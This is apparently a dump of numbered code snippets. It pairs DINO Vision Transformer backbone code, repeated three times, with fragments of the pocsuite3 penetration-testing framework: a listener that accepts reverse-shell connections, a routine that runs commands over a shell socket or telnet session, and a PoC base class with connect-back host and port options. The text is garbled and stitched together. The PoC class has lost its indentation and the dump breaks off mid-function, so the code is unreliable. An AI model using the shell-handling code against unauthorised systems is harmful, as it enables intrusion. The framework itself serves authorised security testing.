        return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)

    def prepare_tokens(self, x):
        """Patch-embed the image and prepend [CLS] + positional encodings."""
        B, nc, w, h = x.shape
        x = self.patch_embed(x)  # patch linear embedding
        # add the [CLS] token to the embed patch tokens
        cls_tokens = self.cls_token.expand(B, -1, -1)
        x = torch.cat((cls_tokens, x), dim=1)
        # add positional encoding to each token
        x = x + self.interpolate_pos_encoding(x, w, h)
        return self.pos_drop(x)

    def forward(self, x):
        # Return the normalized [CLS] token embedding of the last block.
        x = self.prepare_tokens(x)
        for blk in self.blocks:
            x = blk(x)
        x = self.norm(x)
        return x[:, 0]

    def get_last_selfattention(self, x):
        # Run every block normally, but ask the final block for its
        # self-attention map instead of its output tokens.
        x = self.prepare_tokens(x)
        for i, blk in enumerate(self.blocks):
            if i < len(self.blocks) - 1:
                x = blk(x)
            else:
                # return attention of the last block
                return blk(x, return_attention=True)

    def get_intermediate_layers(self, x, n=1):
        # we return the (normalized) output tokens from the `n` last blocks
        x = self.prepare_tokens(x)
        output = []
        for i, blk in enumerate(self.blocks):
            x = blk(x)
            if len(self.blocks) - i <= n:
                output.append(self.norm(x))
        return output
def vit_tiny(patch_size=16, **kwargs):
    """Build a ViT-Tiny backbone (embed_dim 192, 3 heads, depth 12)."""
    arch = dict(embed_dim=192, depth=12, num_heads=3, mlp_ratio=4,
                qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6))
    return VisionTransformer(patch_size=patch_size, **arch, **kwargs)
161,755 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
    """ Vision Transformer (ViT) backbone as used by DINO.

    Splits the image into patches, prepends a learnable [CLS] token, adds
    (possibly interpolated) positional embeddings, and applies `depth`
    transformer blocks. `forward` returns the final [CLS] embedding.
    """
    def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
                 num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
                 drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
        super().__init__()
        self.num_features = self.embed_dim = embed_dim
        self.patch_embed = PatchEmbed(
            img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
        num_patches = self.patch_embed.num_patches
        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
        self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
        self.pos_drop = nn.Dropout(p=drop_rate)
        # Per-block drop-path rates grow linearly with depth
        # (stochastic depth decay rule).
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]
        self.blocks = nn.ModuleList([
            Block(
                dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
                drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
            for i in range(depth)])
        self.norm = norm_layer(embed_dim)
        # Classifier head; Identity when num_classes == 0 (pure feature extractor).
        self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        trunc_normal_(self.pos_embed, std=.02)
        trunc_normal_(self.cls_token, std=.02)
        self.apply(self._init_weights)

    def _init_weights(self, m):
        # Truncated-normal init for linear weights; zeros/ones for LayerNorm.
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight, std=.02)
            if isinstance(m, nn.Linear) and m.bias is not None:
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.LayerNorm):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)

    def interpolate_pos_encoding(self, x, w, h):
        """Bicubically resample the patch position embeddings when the input
        resolution differs from the pre-training resolution."""
        npatch = x.shape[1] - 1
        N = self.pos_embed.shape[1] - 1
        if npatch == N and w == h:
            return self.pos_embed
        class_pos_embed = self.pos_embed[:, 0]
        patch_pos_embed = self.pos_embed[:, 1:]
        dim = x.shape[-1]
        w0 = w // self.patch_embed.patch_size
        h0 = h // self.patch_embed.patch_size
        # we add a small number to avoid floating point error in the interpolation
        # see discussion at https://github.com/facebookresearch/dino/issues/8
        w0, h0 = w0 + 0.1, h0 + 0.1
        patch_pos_embed = nn.functional.interpolate(
            patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
            scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
            mode='bicubic',
        )
        assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
        patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
        return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)

    def prepare_tokens(self, x):
        """Patch-embed the image and prepend [CLS] + positional encodings."""
        B, nc, w, h = x.shape
        x = self.patch_embed(x)  # patch linear embedding
        # add the [CLS] token to the embed patch tokens
        cls_tokens = self.cls_token.expand(B, -1, -1)
        x = torch.cat((cls_tokens, x), dim=1)
        # add positional encoding to each token
        x = x + self.interpolate_pos_encoding(x, w, h)
        return self.pos_drop(x)

    def forward(self, x):
        # Return the normalized [CLS] token embedding of the last block.
        x = self.prepare_tokens(x)
        for blk in self.blocks:
            x = blk(x)
        x = self.norm(x)
        return x[:, 0]

    def get_last_selfattention(self, x):
        # Run every block normally, but ask the final block for its
        # self-attention map instead of its output tokens.
        x = self.prepare_tokens(x)
        for i, blk in enumerate(self.blocks):
            if i < len(self.blocks) - 1:
                x = blk(x)
            else:
                # return attention of the last block
                return blk(x, return_attention=True)

    def get_intermediate_layers(self, x, n=1):
        # we return the (normalized) output tokens from the `n` last blocks
        x = self.prepare_tokens(x)
        output = []
        for i, blk in enumerate(self.blocks):
            x = blk(x)
            if len(self.blocks) - i <= n:
                output.append(self.norm(x))
        return output
def vit_small(patch_size=16, **kwargs):
    """Build a ViT-Small backbone (embed_dim 384, 6 heads, depth 12)."""
    arch = dict(embed_dim=384, depth=12, num_heads=6, mlp_ratio=4,
                qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6))
    return VisionTransformer(patch_size=patch_size, **arch, **kwargs)
161,756 | import math
from functools import partial
import torch
import torch.nn as nn
from utils import trunc_normal_
class VisionTransformer(nn.Module):
    """ Vision Transformer (ViT) backbone as used by DINO.

    Splits the image into patches, prepends a learnable [CLS] token, adds
    (possibly interpolated) positional embeddings, and applies `depth`
    transformer blocks. `forward` returns the final [CLS] embedding.
    """
    def __init__(self, img_size=[224], patch_size=16, in_chans=3, num_classes=0, embed_dim=768, depth=12,
                 num_heads=12, mlp_ratio=4., qkv_bias=False, qk_scale=None, drop_rate=0., attn_drop_rate=0.,
                 drop_path_rate=0., norm_layer=nn.LayerNorm, **kwargs):
        super().__init__()
        self.num_features = self.embed_dim = embed_dim
        self.patch_embed = PatchEmbed(
            img_size=img_size[0], patch_size=patch_size, in_chans=in_chans, embed_dim=embed_dim)
        num_patches = self.patch_embed.num_patches
        self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
        self.pos_embed = nn.Parameter(torch.zeros(1, num_patches + 1, embed_dim))
        self.pos_drop = nn.Dropout(p=drop_rate)
        # Per-block drop-path rates grow linearly with depth
        # (stochastic depth decay rule).
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]
        self.blocks = nn.ModuleList([
            Block(
                dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,
                drop=drop_rate, attn_drop=attn_drop_rate, drop_path=dpr[i], norm_layer=norm_layer)
            for i in range(depth)])
        self.norm = norm_layer(embed_dim)
        # Classifier head; Identity when num_classes == 0 (pure feature extractor).
        self.head = nn.Linear(embed_dim, num_classes) if num_classes > 0 else nn.Identity()
        trunc_normal_(self.pos_embed, std=.02)
        trunc_normal_(self.cls_token, std=.02)
        self.apply(self._init_weights)

    def _init_weights(self, m):
        # Truncated-normal init for linear weights; zeros/ones for LayerNorm.
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight, std=.02)
            if isinstance(m, nn.Linear) and m.bias is not None:
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.LayerNorm):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)

    def interpolate_pos_encoding(self, x, w, h):
        """Bicubically resample the patch position embeddings when the input
        resolution differs from the pre-training resolution."""
        npatch = x.shape[1] - 1
        N = self.pos_embed.shape[1] - 1
        if npatch == N and w == h:
            return self.pos_embed
        class_pos_embed = self.pos_embed[:, 0]
        patch_pos_embed = self.pos_embed[:, 1:]
        dim = x.shape[-1]
        w0 = w // self.patch_embed.patch_size
        h0 = h // self.patch_embed.patch_size
        # we add a small number to avoid floating point error in the interpolation
        # see discussion at https://github.com/facebookresearch/dino/issues/8
        w0, h0 = w0 + 0.1, h0 + 0.1
        patch_pos_embed = nn.functional.interpolate(
            patch_pos_embed.reshape(1, int(math.sqrt(N)), int(math.sqrt(N)), dim).permute(0, 3, 1, 2),
            scale_factor=(w0 / math.sqrt(N), h0 / math.sqrt(N)),
            mode='bicubic',
        )
        assert int(w0) == patch_pos_embed.shape[-2] and int(h0) == patch_pos_embed.shape[-1]
        patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
        return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)

    def prepare_tokens(self, x):
        """Patch-embed the image and prepend [CLS] + positional encodings."""
        B, nc, w, h = x.shape
        x = self.patch_embed(x)  # patch linear embedding
        # add the [CLS] token to the embed patch tokens
        cls_tokens = self.cls_token.expand(B, -1, -1)
        x = torch.cat((cls_tokens, x), dim=1)
        # add positional encoding to each token
        x = x + self.interpolate_pos_encoding(x, w, h)
        return self.pos_drop(x)

    def forward(self, x):
        # Return the normalized [CLS] token embedding of the last block.
        x = self.prepare_tokens(x)
        for blk in self.blocks:
            x = blk(x)
        x = self.norm(x)
        return x[:, 0]

    def get_last_selfattention(self, x):
        # Run every block normally, but ask the final block for its
        # self-attention map instead of its output tokens.
        x = self.prepare_tokens(x)
        for i, blk in enumerate(self.blocks):
            if i < len(self.blocks) - 1:
                x = blk(x)
            else:
                # return attention of the last block
                return blk(x, return_attention=True)

    def get_intermediate_layers(self, x, n=1):
        # we return the (normalized) output tokens from the `n` last blocks
        x = self.prepare_tokens(x)
        output = []
        for i, blk in enumerate(self.blocks):
            x = blk(x)
            if len(self.blocks) - i <= n:
                output.append(self.norm(x))
        return output
def vit_base(patch_size=16, **kwargs):
    """Build a ViT-Base backbone (embed_dim 768, 12 heads, depth 12)."""
    arch = dict(embed_dim=768, depth=12, num_heads=12, mlp_ratio=4,
                qkv_bias=True, norm_layer=partial(nn.LayerNorm, eps=1e-6))
    return VisionTransformer(patch_size=patch_size, **arch, **kwargs)
161,757 | import os
def find_packages(where='.'):
    """Return dotted package names for every directory under *where*
    containing an __init__.py (a minimal setuptools.find_packages clone)."""
    packages = []
    for folder, _, files in os.walk(where):
        if "__init__.py" in files:
            packages.append(folder.replace(os.sep, ".").strip("."))
    return packages
161,758 | import base64
import pickle
import zlib
import select
import socket
import threading
import time
import os
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import data_to_stdout, has_poll, get_unicode, mosaic
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import AUTOCOMPLETE_TYPE, OS, CUSTOM_LOGGING
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.core.shell import auto_completion, clear_history, save_history, load_history
from pocsuite3.lib.core.threads import exception_handled_function
def get_sock_listener(listen_port, listen_host="0.0.0.0", ipv6=False, protocol=None):
    """Create, bind and (for TCP) start listening on a server socket.

    protocol: None or "TCP" for SOCK_STREAM, "UDP" for SOCK_DGRAM.
    Returns the socket, or None if the bind failed.
    """
    if protocol in [None, "TCP"]:
        protocol = socket.SOCK_STREAM
    elif protocol in ["UDP"]:
        protocol = socket.SOCK_DGRAM
    if ipv6:
        s = socket.socket(socket.AF_INET6, protocol)
        if listen_host == "0.0.0.0":
            # Map the IPv4 wildcard address onto its IPv6 equivalent.
            listen_host = "::"
    else:
        s = socket.socket(socket.AF_INET, protocol)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    msg = ''
    if conf.enable_tls_listener and protocol == socket.SOCK_STREAM:
        # Wrap the TCP listener in TLS using a generated self-signed cert.
        import ssl
        context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
        cert_path = os.path.join(paths.POCSUITE_TMP_PATH, 'cacert.pem')
        gen_cert(filepath=cert_path)
        context.load_cert_chain(cert_path)
        s = context.wrap_socket(s, server_side=True)
        msg = 'TLS '
    try:
        s.bind((listen_host, listen_port))
    except socket.error:
        s.close()
        # Only warn when listening locally; for a remote connect-back host
        # the failure is reported elsewhere.
        if conf.connect_back_host in kb.data.local_ips:
            # NOTE(review): logger.warn is deprecated in stdlib logging in
            # favour of logger.warning — confirm against this project's logger.
            logger.warn(f'unable to listen on {listen_host}:{listen_port}, check if the port is occupied.')
        return None
    if protocol == socket.SOCK_STREAM:
        msg += "listening on {0}:{1}".format(listen_host, listen_port)
        logger.log(CUSTOM_LOGGING.SYSINFO, msg)
        s.listen(5)
    return s
DEFAULT_LISTENER_PORT = 6666
def get_udp_listener(listen_port=DEFAULT_LISTENER_PORT, listen_host="0.0.0.0", ipv6=False):
    """Open a UDP listener socket (thin wrapper over get_sock_listener)."""
    return get_sock_listener(listen_port=listen_port, listen_host=listen_host,
                             ipv6=ipv6, protocol="UDP")
161,759 | import base64
import pickle
import zlib
import select
import socket
import threading
import time
import os
from pocsuite3.lib.utils import gen_cert
from pocsuite3.lib.core.common import data_to_stdout, has_poll, get_unicode, mosaic
from pocsuite3.lib.core.data import conf, kb, logger, paths
from pocsuite3.lib.core.datatype import AttribDict
from pocsuite3.lib.core.enums import AUTOCOMPLETE_TYPE, OS, CUSTOM_LOGGING
from pocsuite3.lib.core.exception import PocsuiteShellQuitException
from pocsuite3.lib.core.settings import DEFAULT_LISTENER_PORT
from pocsuite3.lib.core.shell import auto_completion, clear_history, save_history, load_history
from pocsuite3.lib.core.threads import exception_handled_function
def listener_worker():
    """Accept reverse-shell connections forever, registering each client
    in kb.data.clients for the interactive console."""
    # NOTE(review): get_tcp_listener is defined elsewhere in the module;
    # presumably it wraps get_sock_listener with protocol="TCP" — confirm.
    s = get_tcp_listener(ipv6=conf.ipv6, listen_port=int(conf.connect_back_port))
    while True:
        try:
            conn, address = s.accept()
            conn.setblocking(1)  # force blocking I/O for the shell session
            client = AttribDict()
            client.conn = conn
            client.address = address
            kb.data.clients.append(client)
            info_msg = "new connection established from {0}".format(mosaic(address[0]))
            logger.log(CUSTOM_LOGGING.SUCCESS, info_msg)
        except Exception:
            # Best effort: one failed accept must not kill the listener loop.
            pass
def exception_handled_function(thread_function, args=(), silent=False):
    """Run *thread_function* with *args*, containing any exception it raises.

    KeyboardInterrupt flags the knowledge base to stop other threads and is
    re-raised; any other exception is logged (unless silent) and swallowed
    so a worker-thread crash cannot take the process down.
    """
    try:
        thread_function(*args)
    except KeyboardInterrupt:
        kb.thread_continue = False
        kb.thread_exception = True
        raise
    except Exception as ex:
        if not silent:
            # current_thread().name replaces currentThread().getName(),
            # both deprecated since Python 3.10.
            logger.error("thread {0}: {1}".format(threading.current_thread().name, str(ex)))
        if conf.verbose > 1:
            # Imported locally: traceback is only needed on this verbose path.
            import traceback
            traceback.print_exc()
def start_listener():
    """Start the background daemon thread that accepts reverse connections."""
    t = threading.Thread(target=exception_handled_function, name="listener-thread", args=[listener_worker])
    # Thread.setDaemon() has been deprecated since Python 3.10;
    # assign the attribute directly instead.
    t.daemon = True
    t.start()
161,760 | import os
import socket
import zlib
import pickle
import base64
import select
import telnetlib
import threading
from pocsuite3.lib.core.poc import POCBase
from pocsuite3.lib.utils import random_str
from pocsuite3.lib.core.common import check_port
from pocsuite3.lib.core.data import conf, logger
def read_results(conn, inputs):
    """Send the command *inputs* over an interactive channel and return its output.

    *conn* may be a callable in-process shell, a raw socket, or a
    telnetlib.Telnet session. For the remote channels a random flag string is
    appended to the command so the end of the output can be detected; the
    flag and the echoed command are stripped from the result.

    Returns the command output as bytes, always ending with b'\n'
    (b'\n' alone for unsupported connection types).
    """
    if callable(conn):
        # In-process shell: invoke directly and normalise the result to bytes.
        results = conn(inputs.decode())
        if not isinstance(results, bytes):
            results = results.encode()
        if results.strip() == b'':
            results = b'COMMAND NO OUTPUT\n'
        return results
    if isinstance(conn, socket.socket):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        conn.send(inputs)
        count = 10
        results = b''
        while count:
            count -= 1
            ready = select.select([conn], [], [], 0.2)
            if ready[0]:
                results += conn.recv(1024)
                # flag appears twice: echoed with the command and after the output
                if results.count(flag) >= 2:
                    break
        results = results.split(inputs.strip())[-1]
        results = os.linesep.encode().join(
            results.split(flag)[0].splitlines()[0:-1])
        return results.strip() + b'\n'
    # telnetlib was removed from the stdlib in Python 3.13, so import it lazily
    # and only when the other dispatch branches did not match.
    try:
        import telnetlib
    except ImportError:
        return b'\n'
    if isinstance(conn, telnetlib.Telnet):
        flag = random_str(6).encode()
        inputs = inputs.strip() + b';' + flag + b'\n'
        results = b''
        conn.write(inputs)
        count = 10
        while count:
            count -= 1
            # BUG FIX: wait for the flag we actually sent. The original built a
            # *fresh* random string per iteration, which could never match, so
            # every read_until always burned the full 0.2s timeout.
            chunk = conn.read_until(flag, 0.2)
            if len(chunk) > 0:
                results += chunk
            if results.count(flag) >= 2:
                # remove the Telnet input echo
                results = results.split(inputs.strip())[-1]
                results = os.linesep.encode().join(
                    results.split(flag)[0].splitlines()[0:-1])
                return results.strip() + b'\n'
    return b'\n'
def start_listener(conn):
    """Start the background daemon thread that shuttles data to/from *conn*."""
    t = threading.Thread(target=flow_redirect,
                         name="bind-listener-thread",
                         args=[conn])
    # Thread.setDaemon() has been deprecated since Python 3.10;
    # assign the attribute directly instead.
    t.daemon = True
    t.start()
class POCBase(object):
def __init__(self):
# PoC attributes
self.vulID = getattr(self, 'vulID', '0')
self.version = getattr(self, 'version', '1')
self.author = getattr(self, 'author', '')
self.vulDate = getattr(self, 'vulDate', '')
self.createDate = getattr(self, 'createDate', '')
self.updateDate = getattr(self, 'updateDate', '')
self.references = getattr(self, 'references', [])
self.name = getattr(self, 'name', '')
self.appPowerLink = getattr(self, 'appPowerLink', '')
self.appName = getattr(self, 'appName', '')
self.appVersion = getattr(self, 'appVersion', '')
self.vulType = getattr(self, 'vulType', '')
self.desc = getattr(self, 'desc', '')
self.samples = getattr(self, 'samples', [])
self.install_requires = getattr(self, 'install_requires', [])
self.dork = getattr(self, 'dork', {})
self.suricata_request = getattr(self, 'suricata_request', '')
self.suricata_response = getattr(self, 'suricata_response', '')
#
self.type = None
self.target = None
self.headers = None
self.url = None
self.scheme = None
self.rhost = None
self.rport = None
self.netloc = None
self.mode = None
self.params = None
self.verbose = None
self.expt = (0, 'None')
self.current_protocol = getattr(self, "protocol", POC_CATEGORY.PROTOCOL.HTTP)
self.current_protocol_port = getattr(self, "protocol_default_port", 0)
self.pocDesc = getattr(self, "pocDesc", "Poc的作者好懒呀!")
self.host_ip = get_host_ip(check_private=False)
# gloabl options init
self.global_options = OrderedDict()
if self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
self.global_options["target"] = OptString("",
"Target HTTP, IPv4, IPv6 address or file with ip:port (file://)",
require=True)
self.global_options["referer"] = OptString("", "HTTP Referer header value")
self.global_options["agent"] = OptString("", "HTTP User-Agent header value")
self.global_options["proxy"] = OptString(
"", "Use a proxy to connect to the target URL (protocol://host:port)")
self.global_options["timeout"] = OptInteger(10, "Seconds to wait before timeout connection (default 10)")
else:
self.global_options["rhost"] = OptString('', 'The target host', require=True)
self.global_options["rport"] = OptPort('', 'The target port', require=True)
# payload options for exploit
self.payload_options = OrderedDict()
if hasattr(self, "_shell"):
self.payload_options["lhost"] = OptString(self.host_ip, "The listen address")
self.payload_options["lport"] = OptPort(6666, "The listen port")
self.options = OrderedDict()
# module options init
if hasattr(self, "_options"):
self.options.update(self._options())
def get_options(self):
    """Return a merged view of every option group for this PoC.

    Module-specific options come first, then payload options, then the
    global options; a later group overwrites duplicate keys.
    """
    merged = OrderedDict()
    for group in (self.options, self.payload_options, self.global_options):
        merged.update(group)
    return merged
def get_option(self, name):
    """Return the value of module option *name*.

    Unknown names raise PocsuiteValidationException.  A value embedding a
    '{0}...{1}' connect-back template is rendered with the configured
    listener host and port before being returned.
    """
    if name not in self.options:
        raise PocsuiteValidationException
    value = self.options[name].value
    # a '{0}...{1}' pattern marks a reverse-payload template
    is_payload_template = re.search(r'\{0\}.+\{1\}', str(value)) is not None
    if is_payload_template:
        value = value.format(conf.connect_back_host, conf.connect_back_port)
    return value
def get_infos(self):
    """Return a dict of this PoC's descriptive metadata.

    Only fields that exist on the instance and are truthy are included.
    """
    fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
              "appPowerLink", "appName", "appVersion", "vulType", "desc", "pocDesc", "current_protocol"]
    return {field: getattr(self, field) for field in fields if getattr(self, field, None)}
def getg_option(self, name):
    """Return a global option's value, normalising "" (unset) to 0.

    Unknown names raise PocsuiteValidationException.
    """
    if name not in self.global_options:
        raise PocsuiteValidationException
    value = self.global_options[name].value
    # an empty string means "not configured yet"
    return 0 if value == "" else value
def getp_option(self, name):
    """Return the value of payload option *name* (unknown names raise)."""
    if name not in self.payload_options:
        raise PocsuiteValidationException
    option = self.payload_options[name]
    return option.value
def get_category(self):
    """Return the PoC category, defaulting to 'Unknown' when unset."""
    return getattr(self, 'category', 'Unknown')
def set_options(self, kwargs):
    """Bulk-merge *kwargs* into the module options.

    When the instance has no options container yet, *kwargs* becomes it.
    """
    if not hasattr(self, 'options'):
        self.options = kwargs
    else:
        self.options.update(kwargs)
def set_option(self, key, value):
    """Assign *value* to an existing module option; unknown keys raise."""
    if key not in self.options:
        raise PocsuiteValidationException("No key " + key)
    # option objects validate/convert the value through their __set__
    self.options[key].__set__("", value)
def setg_option(self, key, value):
    """Assign *value* to an existing global option; unknown keys raise."""
    if key not in self.global_options:
        raise PocsuiteValidationException("No key " + key)
    # option objects validate/convert the value through their __set__
    self.global_options[key].__set__("", value)
def setp_option(self, key, value):
    """Assign *value* to an existing payload option; unknown keys raise."""
    if key not in self.payload_options:
        raise PocsuiteValidationException("No key " + key)
    # option objects validate/convert the value through their __set__
    self.payload_options[key].__set__("", value)
def check_requirement(self, *args):
    """Verify every required option in the given option groups is set.

    Each positional argument is a dict of option objects; a required
    option whose value is still "" aborts with a validation error.
    Returns True when all requirements are satisfied.
    """
    for group in args:
        for key, option in group.items():
            if option.require and option.value == "":
                raise PocsuiteValidationException(
                    "'{key}' must be set, please using command 'set {key}'".format(key=key))
    return True
def build_url(self, target=''):
    """Normalise *target* into a canonical URL for this PoC's protocol.

    Fills in a default scheme and port per protocol, keeps IPv6 hosts
    bracketed, and (for non-HTTP protocols outside console mode) pushes
    rhost/rport into the global options.  Also updates self.scheme,
    self.rhost, self.rport and self.netloc as side effects.  Returns the
    URL without a trailing '/'.
    """
    if not target:
        target = self.target
    # https://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
    protocol_default_port_map = {
        POC_CATEGORY.PROTOCOL.FTP: 21,
        POC_CATEGORY.PROTOCOL.SSH: 22,
        POC_CATEGORY.PROTOCOL.TELNET: 23,
        POC_CATEGORY.PROTOCOL.REDIS: 6379,
        POC_CATEGORY.PROTOCOL.SMTP: 25,
        POC_CATEGORY.PROTOCOL.DNS: 53,
        POC_CATEGORY.PROTOCOL.SNMP: 161,
        POC_CATEGORY.PROTOCOL.SMB: 445,
        POC_CATEGORY.PROTOCOL.MQTT: 1883,
        POC_CATEGORY.PROTOCOL.MYSQL: 3306,
        POC_CATEGORY.PROTOCOL.RDP: 3389,
        POC_CATEGORY.PROTOCOL.UPNP: 1900,
        POC_CATEGORY.PROTOCOL.AJP: 8009,
        POC_CATEGORY.PROTOCOL.XMPP: 5222,
        POC_CATEGORY.PROTOCOL.WINBOX: 8291,
        POC_CATEGORY.PROTOCOL.MEMCACHED: 11211,
        POC_CATEGORY.PROTOCOL.BACNET: 47808,
        POC_CATEGORY.PROTOCOL.T3: 7001,
    }
    # a PoC-declared port overrides the well-known default for its protocol
    if self.current_protocol_port:
        protocol_default_port_map[self.current_protocol] = self.current_protocol_port
    try:
        pr = urlparse(target)
        is_ipv6 = pr.netloc.startswith('[')
        self.scheme = pr.scheme
        self.rhost = pr.hostname
        self.rport = pr.port or self.current_protocol_port
        # if protocol is not provided and the port endswith 443, we adjust the protocol to https
        if (self.current_protocol not in protocol_default_port_map or
                self.current_protocol == POC_CATEGORY.PROTOCOL.HTTP):
            if self.scheme not in ['http', 'https']:
                self.scheme = 'https' if str(self.rport).endswith('443') else 'http'
            self.rport = self.rport if self.rport else 443 if self.scheme == 'https' else 80
        else:
            # adjust protocol
            self.scheme = self.current_protocol.lower()
            # adjust port
            if not self.rport:
                self.rport = protocol_default_port_map[self.current_protocol]
        self.netloc = f'[{self.rhost}]:{self.rport}' if is_ipv6 else f'{self.rhost}:{self.rport}'
        pr = pr._replace(scheme=self.scheme)
        pr = pr._replace(netloc=self.netloc)
        target = pr.geturl()
    except ValueError:
        # unparsable target: hand it back unchanged (minus the trailing '/')
        pass
    if self.target and self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP and not conf.console_mode:
        self.setg_option("rhost", self.rhost)
        self.setg_option("rport", self.rport)
    return target.rstrip('/')
def _execute(self):
    """Dispatch to the PoC routine matching the current run mode.

    'shell' requires a _shell implementation; 'attack' runs _attack;
    anything else falls back to _verify.  Returns the routine's Output.
    """
    mode = self.mode
    if mode == 'shell':
        # a PoC without a _shell implementation cannot run in shell mode
        if not hasattr(self, "_shell"):
            raise NotImplementedError
        return self._shell()
    if mode == 'attack':
        return self._attack()
    return self._verify()
def execute(self, target, headers=None, params=None, mode='verify', verbose=True):
    """Run this PoC against *target* in the given mode.

    Normalises the target URL, stores per-run state on the instance,
    invokes the mode-specific routine via _execute(), and converts every
    recognised failure into an (error-id, exception) pair in self.expt
    plus an empty Output — execute() itself does not raise.
    """
    self.target = target
    self.url = self.build_url()
    if self.url != self.target:
        logger.debug(f'auto correct url: {mosaic(self.target)} -> {mosaic(self.url)}')
    # TODO: Thread safe problem in self.headers
    # https://github.com/knownsec/pocsuite3/issues/262
    # The value should not be modified in PoC Plugin !!!
    # Some PoC use this bug as a feature, For the purpose of PoC plugin compatibility, it will not be fixed
    self.headers = headers
    if isinstance(params, dict) or isinstance(params, str):
        self.params = params
    else:
        self.params = {}
    self.mode = mode
    self.verbose = verbose
    # (error-type id, exception) describing the last failure, if any
    self.expt = (0, 'None')
    # TODO
    output = None
    try:
        output = self._execute()
    except NotImplementedError as e:
        self.expt = (ERROR_TYPE_ID.NOTIMPLEMENTEDERROR, e)
        logger.log(CUSTOM_LOGGING.ERROR, 'POC: {0} not defined "{1}" mode'.format(self.name, self.mode))
        output = Output(self)
    except ConnectTimeout as e:
        # retry the whole PoC up to conf.retry times on connect timeouts
        self.expt = (ERROR_TYPE_ID.CONNECTTIMEOUT, e)
        while conf.retry > 0:
            logger.debug('connect target {0} timeout, retry it.'.format(mosaic(target)))
            try:
                output = self._execute()
                break
            except Exception:
                logger.debug('target {0} retry failed!'.format(mosaic(target)))
            conf.retry -= 1
        if output is None:
            msg = "connect target '{0}' failed!".format(mosaic(target))
            logger.error(msg)
            output = Output(self)
    except HTTPError as e:
        self.expt = (ERROR_TYPE_ID.HTTPERROR, e)
        logger.warn('target {0} HTTPError occurs.'.format(mosaic(target)))
        output = Output(self)
    except ConnectionError as e:
        self.expt = (ERROR_TYPE_ID.CONNECTIONERROR, e)
        msg = "connect target '{0}' failed!".format(mosaic(target))
        logger.error(msg)
        output = Output(self)
    except TooManyRedirects as e:
        self.expt = (ERROR_TYPE_ID.TOOMANYREDIRECTS, e)
        logger.debug(str(e))
        output = Output(self)
    except BaseException as e:
        # catch-all so a buggy PoC never crashes the framework
        self.expt = (ERROR_TYPE_ID.OTHER, e)
        logger.error("PoC has raised a exception")
        logger.error(str(traceback.format_exc()))
        # logger.exception(e)
        output = Output(self)
    if output:
        output.params = self.params
    return output
def _check(self, dork='', allow_redirects=False, return_obj=False, is_http=True, honeypot_check=True):
    """Pre-flight sanity check before running the PoC.

    Verifies the target port is open, probes both http and https to pick
    the scheme that actually answers, optionally matches *dork* against
    the response (headers + body, case-insensitive), and applies a
    heuristic honeypot filter.  Returns a bool, or the requests.Response
    itself when *return_obj* is True.  Disabled entirely by conf.no_check.
    """
    if conf.get('no_check', False):
        return True
    u = urlparse(self.url)
    # the port closed
    if u.port and not check_port(u.hostname, u.port):
        logger.debug(f'{mosaic(self.url)}, the port is closed.')
        return False
    # non-HTTP protocols only need the port probe above
    if is_http is False or self.current_protocol != POC_CATEGORY.PROTOCOL.HTTP:
        return True
    res = None
    # this only covers most cases
    redirect_https_keyword = [
        # https://www.zoomeye.org/searchResult?q=%22request%20was%20sent%20to%20HTTPS%20port%22
        'request was sent to https port',
        # https://www.zoomeye.org/searchResult?q=%22running%20in%20SSL%20mode.%20Try%22
        'running in ssl mode. try'
    ]
    redirect_https_keyword_found = False
    origin_url = self.url
    netloc = self.url.split('://', 1)[-1]
    # candidate URLs, probed in insertion order
    urls = OrderedSet()
    urls.add(self.url)
    urls.add(f'http://{netloc}')
